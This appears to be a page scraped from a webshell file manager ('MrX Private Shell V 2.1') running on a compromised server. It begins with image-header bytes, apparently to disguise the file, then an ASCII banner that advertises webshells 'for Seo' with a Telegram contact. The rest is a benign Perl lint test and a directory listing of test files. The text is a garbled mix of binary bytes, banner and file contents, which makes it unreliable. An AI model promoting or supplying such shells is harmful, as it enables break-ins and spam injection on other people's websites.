����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use strict;
use warnings;
use Test::More;
use Capture::Tiny qw( capture );
use Encode qw( decode );
use FindBin qw( $Bin );
binmode $_, ':encoding(utf-8)'
for map { Test::More->builder->$_ }
qw( output failure_output todo_output );
chdir "$Bin/../.."
or die "Cannot chdir to $Bin/../..: $!";
my ( $out, $err ) = capture { system(qw( precious lint -a )) };
$_ = decode( 'UTF-8', $_ ) for grep {defined} $out, $err;
is( $? >> 8, 0, 'precious lint -a exited with 0' )
or diag($out);
is( $err, q{}, 'no output to stderr' );
done_testing();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 00-compile.t | File | 1.35 KB | 0644 |
|
| eol.t | File | 433 B | 0644 |
|
| mojibake.t | File | 105 B | 0644 |
|
| no-tabs.t | File | 407 B | 0644 |
|
| pod-coverage.t | File | 976 B | 0644 |
|
| pod-spell.t | File | 433 B | 0644 |
|
| pod-syntax.t | File | 170 B | 0644 |
|
| portability.t | File | 88 B | 0644 |
|
| precious.t | File | 559 B | 0644 |
|
| synopsis.t | File | 48 B | 0644 |
|
| test-version.t | File | 415 B | 0644 |
|